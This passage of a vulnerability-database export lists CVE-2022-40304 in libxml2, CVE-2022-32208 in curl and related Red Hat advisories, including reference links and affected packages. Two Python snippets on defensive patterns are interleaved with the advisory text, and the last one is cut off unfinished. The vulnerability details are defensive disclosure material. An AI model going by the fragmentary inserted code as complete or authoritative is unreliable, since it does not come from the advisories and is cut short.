"db": "CNNVD",
"id": "CNNVD-202210-1022"
},
{
"db": "NVD",
"id": "CVE-2022-40304"
}
]
},
"id": "VAR-202210-1070",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-429438"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T23:25:26.950000Z",
"patch": {
"_id": null,
"data": [
{
"title": "libxml2 Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=215772"
},
{
"title": "Debian CVElist Bug Report Logs: libxml2: CVE-2022-40304: dict corruption caused by entity reference cycles",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=8363a596e2a5d2dc61357b1dbd72b616"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-40304"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-40304"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-415",
"trust": 1.0
},
{
"problemtype": "CWE-611",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429438"
},
{
"db": "NVD",
"id": "CVE-2022-40304"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20221209-0003/"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213531"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213533"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213534"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213535"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213536"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/dec/21"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/dec/24"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/dec/25"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/dec/26"
},
{
"trust": 1.7,
"url": "https://gitlab.gnome.org/gnome/libxml2/-/commit/1b41ec4e9433b05bb0376be4725804c54ef1d80b"
},
{
"trust": 1.7,
"url": "https://gitlab.gnome.org/gnome/libxml2/-/tags"
},
{
"trust": 1.7,
"url": "https://gitlab.gnome.org/gnome/libxml2/-/tags/v2.10.3"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/dec/27"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2022-40304"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40304"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40303"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-40303"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1041"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3143"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170555/red-hat-security-advisory-2023-0173-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1267"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1467"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170318/apple-security-advisory-2022-12-13-8.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1501"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213505"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5286"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170955/red-hat-security-advisory-2023-0634-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169857/apple-security-advisory-2022-11-09-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170754/red-hat-security-advisory-2023-0468-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170097/ubuntu-security-notice-usn-5760-2.html"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213534"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.0246"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-40304/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169732/debian-security-advisory-5271-1.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/libxml2-three-vulnerabilities-39554"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169824/libxml2-attribute-parsing-double-free.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1398"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.0816"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169620/gentoo-linux-security-advisory-202210-39.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6321"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.0513"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5792.2"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5455"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5614"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-43680"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-42011"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-35737"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-46848"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-46848"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-42010"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-42012"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-43680"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42012"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2023-22482"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-22482"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35737"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42010"
},
{
"trust": 0.3,
"url": "https://docs.openshift.com/container-platform/latest/cicd/gitops/understanding-openshift-gitops.html"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42011"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-4415"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-47629"
},
{
"trust": 0.2,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3821"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3821"
},
{
"trust": 0.2,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.2,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1022225"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-46285"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2953"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-48303"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2879"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2880"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2869"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2058"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25310"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42898"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25309"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2057"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4883"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-44617"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2058"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2519"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2056"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2521"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41715"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2056"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2868"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1122"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1122"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2867"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2519"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2057"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0466"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0467"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-22736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-22736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0468"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213505."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23521"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-0923"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-47629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23521"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-41903"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-4415"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0977"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42867"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42849"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42842"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42866"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42845"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42865"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42863"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42864"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42843"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42852"
},
{
"trust": 0.1,
"url": "https://support.apple.com/kb/ht204641"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213536."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42837"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42859"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429438"
},
{
"db": "VULMON",
"id": "CVE-2022-40304"
},
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "169857"
},
{
"db": "PACKETSTORM",
"id": "171173"
},
{
"db": "PACKETSTORM",
"id": "170318"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
},
{
"db": "NVD",
"id": "CVE-2022-40304"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-429438",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-40304",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171310",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170753",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170752",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170668",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170754",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169857",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171173",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170318",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202210-1022",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-40304",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-11-23T00:00:00",
"db": "VULHUB",
"id": "VHN-429438",
"ident": null
},
{
"date": "2023-03-09T15:14:10",
"db": "PACKETSTORM",
"id": "171310",
"ident": null
},
{
"date": "2023-01-26T15:34:56",
"db": "PACKETSTORM",
"id": "170753",
"ident": null
},
{
"date": "2023-01-26T15:34:49",
"db": "PACKETSTORM",
"id": "170752",
"ident": null
},
{
"date": "2023-01-24T16:30:22",
"db": "PACKETSTORM",
"id": "170668",
"ident": null
},
{
"date": "2023-01-26T15:35:03",
"db": "PACKETSTORM",
"id": "170754",
"ident": null
},
{
"date": "2022-11-15T16:42:23",
"db": "PACKETSTORM",
"id": "169857",
"ident": null
},
{
"date": "2023-02-28T17:09:39",
"db": "PACKETSTORM",
"id": "171173",
"ident": null
},
{
"date": "2022-12-22T02:13:22",
"db": "PACKETSTORM",
"id": "170318",
"ident": null
},
{
"date": "2022-10-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-1022",
"ident": null
},
{
"date": "2022-11-23T18:15:12.167000",
"db": "NVD",
"id": "CVE-2022-40304",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-23T00:00:00",
"db": "VULHUB",
"id": "VHN-429438",
"ident": null
},
{
"date": "2023-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-1022",
"ident": null
},
{
"date": "2025-04-28T20:15:19.607000",
"db": "NVD",
"id": "CVE-2022-40304",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "libxml2 Code problem vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-1022"
}
],
"trust": 0.6
}
}
VAR-202206-1961
Vulnerability from variot - Updated: 2026-04-10 23:24 When curl < 7.84.0 does FTP transfers secured by krb5, it handles message verification failures wrongly. This flaw makes it possible for a Man-In-The-Middle attack to go unnoticed and even allows it to inject data to the client. Harry Sintonen discovered that curl incorrectly handled certain file permissions. An attacker could possibly use this issue to expose sensitive information. This issue only affected Ubuntu 21.10 and Ubuntu 22.04 LTS. (CVE-2022-32207). -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis:          Moderate: curl security update
Advisory ID:       RHSA-2022:6159-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6159
Issue date:        2022-08-24
CVE Names:         CVE-2022-32206 CVE-2022-32208
====================================================================

1. Summary:
An update for curl is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.
Security Fix(es):
- curl: HTTP compression denial of service (CVE-2022-32206)
- curl: FTP-KRB bad message verification (CVE-2022-32208)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
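CVE-2022-32208 above belongs to a "fail open" bug class: a failed krb5 message verification was treated as success, so a man-in-the-middle could inject data into the FTP transfer. The defensive pattern is to fail closed, sketched here in Python with an HMAC standing in for krb5 message protection (all names and the key are hypothetical, not curl's actual API):

```python
import hashlib
import hmac

# Hypothetical shared secret; stands in for the krb5 session key.
SECRET = b"session-key"

def protect(payload: bytes) -> bytes:
    """Append a MAC to the payload (a stand-in for krb5 message protection)."""
    return payload + hmac.new(SECRET, payload, hashlib.sha256).digest()

def receive(message: bytes) -> bytes:
    """Fail closed: refuse the payload when verification fails.

    The CVE-2022-32208 bug class is the opposite behavior: treating a
    failed verification as success and handing unverified,
    attacker-controllable bytes to the caller.
    """
    payload, mac = message[:-32], message[-32:]
    expected = hmac.new(SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("message verification failed; aborting transfer")
    return payload
```

A tampered message must abort the transfer rather than be silently accepted; `hmac.compare_digest` is used so the comparison itself does not leak timing information.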
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2099300 - CVE-2022-32206 curl: HTTP compression denial of service
2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification
- Package List:
Red Hat Enterprise Linux BaseOS (v. 8):
Source: curl-7.61.1-22.el8_6.4.src.rpm
aarch64: curl-7.61.1-22.el8_6.4.aarch64.rpm curl-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm curl-debugsource-7.61.1-22.el8_6.4.aarch64.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm libcurl-7.61.1-22.el8_6.4.aarch64.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm libcurl-devel-7.61.1-22.el8_6.4.aarch64.rpm libcurl-minimal-7.61.1-22.el8_6.4.aarch64.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm
ppc64le: curl-7.61.1-22.el8_6.4.ppc64le.rpm curl-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm curl-debugsource-7.61.1-22.el8_6.4.ppc64le.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-devel-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-minimal-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm
s390x: curl-7.61.1-22.el8_6.4.s390x.rpm curl-debuginfo-7.61.1-22.el8_6.4.s390x.rpm curl-debugsource-7.61.1-22.el8_6.4.s390x.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.s390x.rpm libcurl-7.61.1-22.el8_6.4.s390x.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.s390x.rpm libcurl-devel-7.61.1-22.el8_6.4.s390x.rpm libcurl-minimal-7.61.1-22.el8_6.4.s390x.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.s390x.rpm
x86_64: curl-7.61.1-22.el8_6.4.x86_64.rpm curl-debuginfo-7.61.1-22.el8_6.4.i686.rpm curl-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm curl-debugsource-7.61.1-22.el8_6.4.i686.rpm curl-debugsource-7.61.1-22.el8_6.4.x86_64.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.i686.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm libcurl-7.61.1-22.el8_6.4.i686.rpm libcurl-7.61.1-22.el8_6.4.x86_64.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.i686.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm libcurl-devel-7.61.1-22.el8_6.4.i686.rpm libcurl-devel-7.61.1-22.el8_6.4.x86_64.rpm libcurl-minimal-7.61.1-22.el8_6.4.i686.rpm libcurl-minimal-7.61.1-22.el8_6.4.x86_64.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.i686.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2022-32206
https://access.redhat.com/security/cve/CVE-2022-32208
https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBYwa9b9zjgjWX9erEAQi1rQ/+Kw4R4cPAIlGUx4vJwSMw8zwCDxnLviV+ YgCpaCuUwCkWI9hrAQNC1O5i2MSl7j8jI9dt0Oe770VwNIZPzJMK8MX96zYdeOsg EiuwTW5KTWKwCeAvPt6ydVji9R0N7FMDBxmdi1aE8gBt8J6pIwp4ozrR4jXiXCjB dQJlc2kf7YXDiengte1jpXNCFh2ar9t8lqmW53Hu05zR8VFdAPk6NM1kTIploICN blR9t80TbWouBvN2A6gIZ0ZWnbJOY9odCBHdo5ay8kufmQC0K9QKb7jyoaUUHVau 5/HVbncd7bFQuyu+yGoOxU1TCxwee3B9LAmR4uzDdJcaTxPgvK2cyskdTVz+9N9k nJLDYGaL7UNC7YkbByN58VC6fdGsnn8QIXHg7ICTgdhYiPZ3uP5JUiDrAGKKb/v+ XPtwYHuh6yX0OfS0JqFEMjR0P1rFLiuDNBOPBDiTV2mBVd+7kiNTs1izUDGwQeFd VaNNNU4kpD3FGOgRwxIAKz2qCX+Ody8goBeJJPGcVlmDp025ZrMisl1QC8/3eTas ML+TSvTeaSY/I35uPzKsoh1f+/lAwUsB54I6NxHH3vWYryievuSdpjtNsQInACjw owX+pU5CfOwdD56Hqdhb7fjuJVufo6VC8b0zy/vSZYnNt0cfojXA73F3B1K5+XcF bBkTeh+fqsg=powM
-----END PGP SIGNATURE-----

--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Description:
Red Hat Advanced Cluster Management for Kubernetes 2.3.12 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/
Security fix:
- CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
Bug fixes:
- Remove 1.9.1 from Proxy Patch Documentation (BZ# 2076856)
- RHACM 2.3.12 images (BZ# 2101411)
- Bugs fixed (https://bugzilla.redhat.com/):
2076856 - [doc] Remove 1.9.1 from Proxy Patch Documentation
2101411 - RHACM 2.3.12 images
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
- Description:
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:
Security Fix(es):
- golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
- kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
- golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
- golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
- golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)
- golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)
- golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
- golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
- golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
- golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)
- golang: syscall: faccessat checks wrong group (CVE-2022-29526)
- golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)
- golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
- golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)
- golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)
- golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)
- golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)
- golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
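Several of the golang CVEs above (CVE-2022-1962, CVE-2022-28131, CVE-2022-30630 through CVE-2022-30635) are the same bug class: unbounded recursion on attacker-controlled nested input exhausts the stack. The upstream fixes impose hard depth limits; the idea can be sketched with a hypothetical parser in Python (the limit value and function are illustrative only):

```python
def max_depth(text: str, limit: int = 64) -> int:
    """Measure nesting depth of a parenthesized input, rejecting anything
    nested deeper than `limit` instead of letting depth grow without
    bound. A recursive-descent parser would apply the same check on
    each descent; here the scan is iterative for brevity."""
    depth = deepest = 0
    for ch in text:
        if ch == "(":
            depth += 1
            if depth > limit:
                raise ValueError(f"nesting exceeds limit of {limit}")
            deepest = max(deepest, depth)
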